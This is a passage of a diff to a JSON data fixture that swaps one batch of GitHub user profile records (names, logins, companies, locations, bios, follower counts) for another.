"2024-09-22T08:34:19.381Z", + "nest_updated_at": "2024-09-22T18:51:34.086Z", + "name": "Adam Patridge", + "login": "patridge", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/in/14356?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/713665?v=4", + "company": "PatridgeDev, LLC", + "location": "Cheyenne, WY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-07-04T12:15:06Z", - "updated_at": "2018-07-04T12:15:06Z", - "node_id": "MDM6Qm90NDA4MjkwODI=", - "bio": "", + "following_count": 14, + "followers_count": 88, + "public_gists_count": 22, + "public_repositories_count": 106, + "created_at": "2011-04-06T18:21:41Z", + "updated_at": "2024-09-19T21:59:40Z", + "node_id": "MDQ6VXNlcjcxMzY2NQ==", + "bio": "Mobile .NET developer with a JavaScript addiction. Xamarin MVP turned full Xamarin. (@Microsoft, but opinions are mine.)", "is_hireable": false, - "twitter_username": "" + "twitter_username": "PatridgeDev" } }, { "model": "github.user", - "pk": 1641, + "pk": 6935, "fields": { - "nest_created_at": "2024-09-12T00:20:25.752Z", - "nest_updated_at": "2024-09-12T00:20:27.398Z", - "name": "", - "login": "the-simmon", + "nest_created_at": "2024-09-22T08:34:19.802Z", + "nest_updated_at": "2024-09-22T18:51:34.398Z", + "name": "Aaron Jheng", + "login": "aaronjheng", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41528189?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/806876?v=4", "company": "", - "location": "", + "location": "Shanghai", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-07-22T00:56:25Z", - "updated_at": "2023-11-21T11:51:56Z", - "node_id": "MDQ6VXNlcjQxNTI4MTg5", + "public_repositories_count": 28, + "created_at": "2011-05-24T06:49:43Z", + "updated_at": "2024-09-01T11:22:05Z", + "node_id": "MDQ6VXNlcjgwNjg3Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401278,74 +659302,74 @@ }, { "model": "github.user", - "pk": 1642, + "pk": 6936, "fields": { - "nest_created_at": "2024-09-12T00:21:08.797Z", - "nest_updated_at": "2024-09-18T19:03:25.110Z", - "name": "Alexander v. Buchholtz", - "login": "albuch", + "nest_created_at": "2024-09-22T08:34:20.139Z", + "nest_updated_at": "2024-09-22T18:51:34.705Z", + "name": "07akioni", + "login": "07akioni", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9433608?v=4", - "company": "@Qudosoft @K-MailOrder ", - "location": "Berlin", + "avatar_url": "https://avatars.githubusercontent.com/u/18677354?v=4", + "company": "DeepSeek", + "location": "China", "collaborators_count": 0, - "following_count": 3, - "followers_count": 17, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2014-10-28T14:30:01Z", - "updated_at": "2024-08-19T11:26:46Z", - "node_id": "MDQ6VXNlcjk0MzM2MDg=", - "bio": "SVP Architecture & Technology @K-MailOrder ", + "following_count": 82, + "followers_count": 1212, + "public_gists_count": 5, + "public_repositories_count": 113, + "created_at": "2016-04-26T09:37:17Z", + "updated_at": "2024-09-13T13:03:32Z", + "node_id": "MDQ6VXNlcjE4Njc3MzU0", + "bio": "I build user interface & things underlying it.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1643, + "pk": 6937, "fields": { - "nest_created_at": "2024-09-12T00:21:13.175Z", - "nest_updated_at": "2024-09-12T00:21:13.175Z", - "name": "Matthew de Detrich", - "login": "mdedetrich", - "email": "mdedetrich@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2337269?v=4", - "company": "Aiven", - "location": "Berlin, Germany", + "nest_created_at": "2024-09-22T08:34:20.458Z", + "nest_updated_at": "2024-09-22T18:51:35.017Z", + "name": "Ayman AbuBaker", + "login": "xdevnull", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12101073?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 88, - "public_gists_count": 19, - "public_repositories_count": 288, - "created_at": "2012-09-13T07:06:55Z", - "updated_at": "2024-08-19T08:59:14Z", - "node_id": "MDQ6VXNlcjIzMzcyNjk=", - "bio": "Open source engineer @ Aiven, working on Kafka", - "is_hireable": false, - "twitter_username": "mdedetrich" + "following_count": 17, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-04-24T14:56:41Z", + "updated_at": "2024-09-20T17:43:21Z", + "node_id": "MDQ6VXNlcjEyMTAxMDcz", + "bio": "(╯°□°)╯︵ ┻━┻", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1644, + "pk": 6938, "fields": { - "nest_created_at": "2024-09-12T00:21:14.414Z", - "nest_updated_at": "2024-09-18T19:03:27.625Z", - "name": "Costas Simatos", - "login": "costas80", + "nest_created_at": "2024-09-22T08:34:20.770Z", + "nest_updated_at": "2024-09-22T18:51:35.335Z", + "name": "Anshul", + "login": "anshulsao", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8297297?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2157327?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-07-29T07:59:04Z", - "updated_at": "2024-07-27T09:43:21Z", - "node_id": "MDQ6VXNlcjgyOTcyOTc=", + "public_repositories_count": 17, + "created_at": "2012-08-15T14:40:50Z", + "updated_at": "2024-09-03T13:44:29Z", + "node_id": "MDQ6VXNlcjIxNTczMjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401353,24 +659377,24 @@ }, { "model": "github.user", - "pk": 1645, + "pk": 6939, "fields": { - "nest_created_at": "2024-09-12T00:21:53.370Z", - "nest_updated_at": "2024-09-18T19:03:33.859Z", - "name": "dependency-check", - "login": "dependency-check", + "nest_created_at": "2024-09-22T08:34:21.085Z", + "nest_updated_at": "2024-09-22T18:51:35.651Z", + "name": "Anna Labetski", + "login": "Athelena", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50874977?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19203377?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 26, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2019-05-21T13:25:11Z", - "updated_at": "2019-09-20T21:09:27Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjUwODc0OTc3", + "public_repositories_count": 5, + "created_at": "2016-05-05T08:59:49Z", + "updated_at": "2023-06-29T09:15:36Z", + "node_id": "MDQ6VXNlcjE5MjAzMzc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401378,99 +659402,99 @@ }, { "model": "github.user", - "pk": 1646, + "pk": 6940, "fields": { - "nest_created_at": "2024-09-12T00:21:58.047Z", - "nest_updated_at": "2024-09-12T00:21:58.047Z", - "name": "tduehr", - "login": "tduehr", + "nest_created_at": "2024-09-22T08:34:21.412Z", + "nest_updated_at": "2024-09-22T18:51:35.966Z", + "name": "Ankit.", + "login": "ankitvarmait", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37545?v=4", - "company": "@nccgroup", - "location": "Chicago, IL", + "avatar_url": "https://avatars.githubusercontent.com/u/38877724?v=4", + "company": "@microsoft", + "location": "", "collaborators_count": 0, - "following_count": 31, - "followers_count": 68, - "public_gists_count": 2, - "public_repositories_count": 66, - "created_at": "2008-12-01T15:21:38Z", - "updated_at": "2024-08-14T11:18:36Z", - "node_id": "MDQ6VXNlcjM3NTQ1", - "bio": "", + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2018-05-01T07:27:33Z", + "updated_at": "2024-08-27T17:46:40Z", + "node_id": "MDQ6VXNlcjM4ODc3NzI0", + "bio": "\r\nWorking as a Full Stack Developer on the Microsoft Visual Studio - Extensibility team, focusing on enhancing developer tools and integrations.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1647, + "pk": 6941, "fields": { - "nest_created_at": "2024-09-12T00:21:59.321Z", - "nest_updated_at": "2024-09-12T00:21:59.321Z", - "name": "Martin Reinhardt", - "login": "hypery2k", - "email": "martin@m13t.de", - "avatar_url": "https://avatars.githubusercontent.com/u/979121?v=4", - "company": "m13t", - "location": "Hamburg", + "nest_created_at": "2024-09-22T08:34:21.724Z", + "nest_updated_at": "2024-09-22T18:51:36.272Z", + "name": "Angelos Petropoulos", + "login": "AngelosP", + "email": "angelos.petropoulos@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8742622?v=4", + "company": "Microsoft", + "location": "", "collaborators_count": 0, - "following_count": 85, - "followers_count": 116, - "public_gists_count": 25, - "public_repositories_count": 236, - "created_at": "2011-08-14T11:16:01Z", - "updated_at": "2024-09-09T09:20:36Z", - "node_id": "MDQ6VXNlcjk3OTEyMQ==", - "bio": "Freelancing Coding Architect", - "is_hireable": true, - "twitter_username": "mreinhardt" + "following_count": 0, + "followers_count": 36, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-09-11T22:00:02Z", + "updated_at": "2023-11-06T17:23:35Z", + "node_id": "MDQ6VXNlcjg3NDI2MjI=", + "bio": "Product Manager at Microsoft", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1648, + "pk": 6942, "fields": { - "nest_created_at": "2024-09-12T00:22:00.593Z", - "nest_updated_at": "2024-09-12T00:22:00.593Z", - "name": "Vladimir Sitnikov", - "login": "vlsi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/213894?v=4", - "company": "Netcracker", - "location": "", + "nest_created_at": "2024-09-22T08:34:22.039Z", + "nest_updated_at": "2024-09-22T18:51:36.585Z", + "name": "Andy Sterland", + "login": "andysterland", + "email": "andysterland@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10997361?v=4", + "company": "Microsoft", + "location": "Redmond, WA, USA", "collaborators_count": 0, - "following_count": 3, - "followers_count": 404, - "public_gists_count": 29, - "public_repositories_count": 202, - "created_at": "2010-03-02T12:51:02Z", - "updated_at": "2024-04-14T07:16:56Z", - "node_id": "MDQ6VXNlcjIxMzg5NA==", - "bio": "Performance Engineer", + "following_count": 26, + "followers_count": 114, + "public_gists_count": 3, + "public_repositories_count": 65, + "created_at": "2015-02-13T19:01:31Z", + "updated_at": "2024-09-04T20:03:17Z", + "node_id": "MDQ6VXNlcjEwOTk3MzYx", + "bio": "", "is_hireable": false, - "twitter_username": "VladimirSitnikv" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1649, + "pk": 6943, "fields": { - "nest_created_at": "2024-09-12T00:22:01.843Z", - "nest_updated_at": "2024-09-12T00:22:01.843Z", - "name": "Matthew Welby", - "login": "w33v1l", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25647579?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:22.356Z", + "nest_updated_at": "2024-09-22T18:51:36.914Z", + "name": "Andrés Reyes Monge", + "login": "armonge", + "email": "armonge@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/770921?v=4", + "company": "parcelLab GmbH ", + "location": "München, Deutschland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2017-02-08T20:59:09Z", - "updated_at": "2023-08-16T16:53:32Z", - "node_id": "MDQ6VXNlcjI1NjQ3NTc5", + "following_count": 25, + "followers_count": 43, + "public_gists_count": 33, + "public_repositories_count": 98, + "created_at": "2011-05-05T20:29:28Z", + "updated_at": "2024-09-04T11:20:08Z", + "node_id": "MDQ6VXNlcjc3MDkyMQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401478,74 +659502,74 @@ }, { "model": "github.user", - "pk": 1650, + "pk": 6944, "fields": { - "nest_created_at": "2024-09-12T00:22:02.674Z", - "nest_updated_at": "2024-09-12T00:22:02.674Z", - "name": "Nick Padilla", - "login": "NickPadilla", - "email": "nicholas@monstersoftwarellc.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1381015?v=4", - "company": "Monster Software LLC", - "location": "New Mexico", + "nest_created_at": "2024-09-22T08:34:22.677Z", + "nest_updated_at": "2024-09-22T18:51:37.272Z", + "name": "Andrii Shafar", + "login": "Reidond", + "email": "reidond@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20406775?v=4", + "company": "", + "location": "Ukraine", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 12, - "created_at": "2012-01-26T03:43:01Z", - "updated_at": "2024-05-10T00:57:43Z", - "node_id": "MDQ6VXNlcjEzODEwMTU=", + "following_count": 41, + "followers_count": 24, + "public_gists_count": 4, + "public_repositories_count": 72, + "created_at": "2016-07-11T20:16:28Z", + "updated_at": "2024-08-24T11:55:58Z", + "node_id": "MDQ6VXNlcjIwNDA2Nzc1", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "reidond69" } }, { "model": "github.user", - "pk": 1651, + "pk": 6945, "fields": { - "nest_created_at": "2024-09-12T00:22:03.901Z", - "nest_updated_at": "2024-09-12T00:22:57.125Z", - "name": "Lars Benedetto", - "login": "lbenedetto", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4466272?v=4", + "nest_created_at": "2024-09-22T08:34:23.009Z", + "nest_updated_at": "2024-09-22T18:51:37.580Z", + "name": "Andrey Lyadusov", + "login": "alyadusov", + "email": "lyadusovandrey@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29537025?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 3, - "followers_count": 14, - "public_gists_count": 2, - "public_repositories_count": 33, - "created_at": "2013-05-18T17:19:55Z", - "updated_at": "2024-09-11T16:17:23Z", - "node_id": "MDQ6VXNlcjQ0NjYyNzI=", + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-06-19T08:54:18Z", + "updated_at": "2024-09-12T13:40:49Z", + "node_id": "MDQ6VXNlcjI5NTM3MDI1", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1652, + "pk": 6946, "fields": { - "nest_created_at": "2024-09-12T00:22:04.733Z", - "nest_updated_at": "2024-09-12T00:22:04.734Z", - "name": "", - "login": "atpanos", + "nest_created_at": "2024-09-22T08:34:23.329Z", + "nest_updated_at": "2024-09-22T18:51:37.887Z", + "name": "Andrew Bayer", + "login": "abayer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26478584?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/120218?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2017-03-17T07:35:45Z", - "updated_at": "2024-07-04T11:28:03Z", - "node_id": "MDQ6VXNlcjI2NDc4NTg0", + "following_count": 1, + "followers_count": 233, + "public_gists_count": 44, + "public_repositories_count": 375, + "created_at": "2009-08-27T18:20:00Z", + "updated_at": "2024-07-19T11:42:14Z", + "node_id": "MDQ6VXNlcjEyMDIxOA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401553,24 +659577,74 @@ }, { "model": "github.user", - "pk": 1653, + "pk": 6947, "fields": { - "nest_created_at": "2024-09-12T00:22:05.675Z", - "nest_updated_at": "2024-09-12T00:22:05.675Z", - "name": "", - "login": "adamtenna", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107559764?v=4", + "nest_created_at": "2024-09-22T08:34:23.679Z", + "nest_updated_at": "2024-09-22T18:51:38.229Z", + "name": "Andre_601", + "login": "Andre601", + "email": "github@andre601.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/11576465?v=4", "company": "", - "location": "", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-06-15T13:22:55Z", - "updated_at": "2024-09-06T13:17:14Z", - "node_id": "U_kgDOBmk7VA", + "following_count": 5, + "followers_count": 115, + "public_gists_count": 3, + "public_repositories_count": 268, + "created_at": "2015-03-20T17:56:52Z", + "updated_at": "2023-04-16T21:44:18Z", + "node_id": "MDQ6VXNlcjExNTc2NDY1", + "bio": "Creator of the Discord-Bot *Purr*, the PurrBot ImageAPI (https://purrbot.site/api) and other things in Java. Discord-Name: Andre_601#0601", + "is_hireable": false, + "twitter_username": "TrueAndre_601" + } +}, +{ + "model": "github.user", + "pk": 6948, + "fields": { + "nest_created_at": "2024-09-22T08:34:24.004Z", + "nest_updated_at": "2024-09-22T18:51:38.535Z", + "name": "Anders Bjerner", + "login": "abjerner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3634580?v=4", + "company": "Limbo", + "location": "Horsens, Denmark", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 83, + "public_gists_count": 28, + "public_repositories_count": 113, + "created_at": "2013-02-19T08:09:09Z", + "updated_at": "2024-09-05T14:49:13Z", + "node_id": "MDQ6VXNlcjM2MzQ1ODA=", + "bio": "Umbraco MVP - System Developer at Limbo (@limbo-works / @skybrud)", + "is_hireable": false, + "twitter_username": "abjerner" + } +}, +{ + "model": "github.user", + "pk": 6949, + "fields": { + "nest_created_at": "2024-09-22T08:34:24.317Z", + "nest_updated_at": "2024-09-22T18:51:38.849Z", + "name": "Alexey Ashurok", + "login": "aotd1", + "email": "github@aotd.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/1684688?v=4", + "company": "@VKCOM ", + "location": "Russia, Moscow", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 15, + "public_gists_count": 5, + "public_repositories_count": 28, + "created_at": "2012-04-27T09:14:00Z", + "updated_at": "2024-04-05T09:19:27Z", + "node_id": "MDQ6VXNlcjE2ODQ2ODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401578,124 +659652,149 @@ }, { "model": "github.user", - "pk": 1654, + "pk": 6950, "fields": { - "nest_created_at": "2024-09-12T00:22:06.490Z", - "nest_updated_at": "2024-09-12T00:29:06.484Z", - "name": "Rainer Schnitker", - "login": "rschnitk", + "nest_created_at": "2024-09-22T08:34:24.628Z", + "nest_updated_at": "2024-09-22T18:51:39.162Z", + "name": "Alexandre Garnier", + "login": "zigarn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32566006?v=4", - "company": "Ceyoniq Technology GmbH", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/175128?v=4", + "company": "@Zenika", + "location": "Paris", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-10-06T08:36:54Z", - "updated_at": "2023-08-21T12:01:23Z", - "node_id": "MDQ6VXNlcjMyNTY2MDA2", + "following_count": 32, + "followers_count": 47, + "public_gists_count": 8, + "public_repositories_count": 19, + "created_at": "2010-01-02T00:13:08Z", + "updated_at": "2024-09-18T14:41:39Z", + "node_id": "MDQ6VXNlcjE3NTEyOA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "zigarn" } }, { "model": "github.user", - "pk": 1655, + "pk": 6951, "fields": { - "nest_created_at": "2024-09-12T00:22:07.283Z", - "nest_updated_at": "2024-09-12T00:22:07.283Z", - "name": "", - "login": "vidgeus", + "nest_created_at": "2024-09-22T08:34:24.947Z", + "nest_updated_at": "2024-09-22T18:51:39.469Z", + "name": "Alexander Varwijk", + "login": "Kingdutch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13273119?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/327697?v=4", + "company": "Open Social", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 20, + "public_gists_count": 11, + "public_repositories_count": 75, + "created_at": "2010-07-09T18:22:49Z", + "updated_at": "2024-06-28T12:08:44Z", + "node_id": "MDQ6VXNlcjMyNzY5Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "Kingdutch" + } +}, +{ + "model": "github.user", + "pk": 6952, + "fields": { + "nest_created_at": "2024-09-22T08:34:25.260Z", + "nest_updated_at": "2024-09-22T18:51:39.778Z", + "name": "Alexander Tesfamichael", + "login": "alextes", + "email": "alex.tesfamichael@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2011351?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-07-10T11:34:13Z", - "updated_at": "2024-06-11T18:30:33Z", - "node_id": "MDQ6VXNlcjEzMjczMTE5", + "following_count": 19, + "followers_count": 136, + "public_gists_count": 17, + "public_repositories_count": 137, + "created_at": "2012-07-20T11:00:56Z", + "updated_at": "2024-07-18T12:09:31Z", + "node_id": "MDQ6VXNlcjIwMTEzNTE=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "alextes" } }, { "model": "github.user", - "pk": 1656, + "pk": 6953, "fields": { - "nest_created_at": "2024-09-12T00:22:08.103Z", - "nest_updated_at": "2024-09-12T00:22:08.103Z", - "name": "Niklas Baudy", - "login": "vanniktech", + "nest_created_at": "2024-09-22T08:34:25.637Z", + "nest_updated_at": "2024-09-22T18:51:40.093Z", + "name": "Alexander Ryzhikov", + "login": "Coobaha", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5759366?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2446638?v=4", + "company": "@framer", + "location": "Helsinki", "collaborators_count": 0, - "following_count": 0, - "followers_count": 868, - "public_gists_count": 1, - "public_repositories_count": 35, - "created_at": "2013-10-23T19:16:22Z", - "updated_at": "2024-08-16T08:03:34Z", - "node_id": "MDQ6VXNlcjU3NTkzNjY=", - "bio": "Remote Software Engineer", + "following_count": 13, + "followers_count": 35, + "public_gists_count": 7, + "public_repositories_count": 138, + "created_at": "2012-09-28T16:15:23Z", + "updated_at": "2024-09-20T07:23:04Z", + "node_id": "MDQ6VXNlcjI0NDY2Mzg=", + "bio": "", "is_hireable": true, - "twitter_username": "vanniktech" + "twitter_username": "coobaha" } }, { "model": "github.user", - "pk": 1657, + "pk": 6954, "fields": { - "nest_created_at": "2024-09-12T00:22:08.917Z", - "nest_updated_at": "2024-09-12T00:22:08.917Z", - "name": "Matthias Kraaz", - "login": "matthiaskraaz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5954500?v=4", + "nest_created_at": "2024-09-22T08:34:25.954Z", + "nest_updated_at": "2024-09-22T18:51:40.405Z", + "name": "EFanZh", + "login": "EFanZh", + "email": "efanzh@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2160692?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2013-11-16T10:42:01Z", - "updated_at": "2024-09-10T16:12:22Z", - "node_id": "MDQ6VXNlcjU5NTQ1MDA=", - "bio": "", + "following_count": 102, + "followers_count": 105, + "public_gists_count": 7, + "public_repositories_count": 73, + "created_at": "2012-08-16T03:24:13Z", + "updated_at": "2024-09-17T11:19:52Z", + "node_id": "MDQ6VXNlcjIxNjA2OTI=", + "bio": "~", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1658, + "pk": 6955, "fields": { - "nest_created_at": "2024-09-12T00:22:09.739Z", - "nest_updated_at": "2024-09-12T00:22:09.739Z", - "name": "Paul", - "login": "AppearamidGuy", + "nest_created_at": "2024-09-22T08:34:26.269Z", + "nest_updated_at": "2024-09-22T18:51:40.716Z", + "name": "Duc Nghiem Xuan", + "login": "xuanduc987", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/133590454?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1186411?v=4", "company": "", - "location": "", + "location": "Kawasaki", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2023-05-14T15:50:29Z", - "updated_at": "2023-06-27T14:27:18Z", - "node_id": "U_kgDOB_Zttg", + "following_count": 18, + "followers_count": 13, + "public_gists_count": 24, + "public_repositories_count": 94, + "created_at": "2011-11-10T15:35:30Z", + "updated_at": "2024-09-11T15:00:06Z", + "node_id": "MDQ6VXNlcjExODY0MTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401703,124 +659802,124 @@ }, { "model": "github.user", - "pk": 1659, + "pk": 6956, "fields": { - "nest_created_at": "2024-09-12T00:22:10.553Z", - "nest_updated_at": "2024-09-12T00:22:10.553Z", - "name": "Víctor Albertos", - "login": "VictorAlbertos", - "email": "me@victoralbertos.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2614726?v=4", - "company": "@ireward", - "location": "Alicante (Spain)", + "nest_created_at": "2024-09-22T08:34:26.578Z", + "nest_updated_at": "2024-09-22T18:51:41.050Z", + "name": "Dovydas Navickas", + "login": "DovydasNavickas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7989797?v=4", + "company": "@reactway", + "location": "Kaunas, Lithuania", "collaborators_count": 0, - "following_count": 0, - "followers_count": 369, - "public_gists_count": 17, - "public_repositories_count": 41, - "created_at": "2012-10-21T19:20:08Z", - "updated_at": "2024-01-29T14:49:21Z", - "node_id": "MDQ6VXNlcjI2MTQ3MjY=", - "bio": "Senior Android engineer", - "is_hireable": false, + "following_count": 6, + "followers_count": 41, + "public_gists_count": 3, + "public_repositories_count": 64, + "created_at": "2014-06-25T20:33:23Z", + "updated_at": "2024-09-13T00:00:59Z", + "node_id": "MDQ6VXNlcjc5ODk3OTc=", + "bio": "C# and TypeScript are my domains", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1660, + "pk": 6957, "fields": { - "nest_created_at": "2024-09-12T00:22:11.378Z", - "nest_updated_at": "2024-09-12T00:22:11.378Z", - "name": "", - "login": "mluckam", + "nest_created_at": "2024-09-22T08:34:26.893Z", + "nest_updated_at": "2024-09-22T18:51:41.356Z", + "name": "D", + "login": "intellix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26581168?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1162531?v=4", + "company": "The Mill Adventure", + "location": "Malta/United Kingdom", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 30, - "created_at": "2017-03-21T19:18:04Z", - "updated_at": "2024-04-18T12:03:36Z", - "node_id": "MDQ6VXNlcjI2NTgxMTY4", - "bio": "", + "public_gists_count": 39, + "public_repositories_count": 157, + "created_at": "2011-10-31T13:51:28Z", + "updated_at": "2024-09-17T15:01:35Z", + "node_id": "MDQ6VXNlcjExNjI1MzE=", + "bio": "Full stack developer for The Mill Adventure working on a variety of sites", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1661, + "pk": 6958, "fields": { - "nest_created_at": "2024-09-12T00:22:12.213Z", - "nest_updated_at": "2024-09-12T00:22:12.213Z", - "name": "Lukas Prediger", - "login": "LukasPrediger", - "email": "lukas@predigerweb.de", - "avatar_url": "https://avatars.githubusercontent.com/u/56033262?v=4", - "company": "Rewe Digital", - "location": "Cologne", + "nest_created_at": "2024-09-22T08:34:27.209Z", + "nest_updated_at": "2024-09-22T18:51:41.669Z", + "name": "Dmitry Verkhoturov", + "login": "paskal", + "email": "paskal.07@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/712534?v=4", + "company": "", + "location": "Dublin", "collaborators_count": 0, "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2019-10-01T13:39:14Z", - "updated_at": "2024-08-08T06:53:35Z", - "node_id": "MDQ6VXNlcjU2MDMzMjYy", - "bio": "Softwaredeveloper @rewe-digital", + "followers_count": 155, + "public_gists_count": 6, + "public_repositories_count": 18, + "created_at": "2011-04-06T08:08:37Z", + "updated_at": "2024-09-22T14:31:42Z", + "node_id": "MDQ6VXNlcjcxMjUzNA==", + "bio": "Site Reliability Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1662, + "pk": 6959, "fields": { - "nest_created_at": "2024-09-12T00:22:13.011Z", - "nest_updated_at": "2024-09-12T00:29:05.239Z", - "name": "Róbert Papp", - "login": "TWiStErRob", - "email": "papp.robert.s@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2906988?v=4", - "company": "Marks and Spencer", - "location": "London, UK", + "nest_created_at": "2024-09-22T08:34:27.532Z", + "nest_updated_at": "2024-09-22T18:51:41.997Z", + "name": "Dmitry Vornychev", + "login": "deitry", + "email": "dm.s.vornychev@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6714840?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 343, - "public_gists_count": 14, - "public_repositories_count": 89, - "created_at": "2012-11-28T00:42:44Z", - "updated_at": "2024-08-29T22:28:46Z", - "node_id": "MDQ6VXNlcjI5MDY5ODg=", - "bio": "Tinkering with little green robots", - "is_hireable": true, - "twitter_username": "twisterrob" + "following_count": 9, + "followers_count": 12, + "public_gists_count": 43, + "public_repositories_count": 68, + "created_at": "2014-02-18T10:56:25Z", + "updated_at": "2024-06-12T10:45:10Z", + "node_id": "MDQ6VXNlcjY3MTQ4NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1663, + "pk": 6960, "fields": { - "nest_created_at": "2024-09-12T00:22:13.837Z", - "nest_updated_at": "2024-09-12T00:22:13.837Z", - "name": 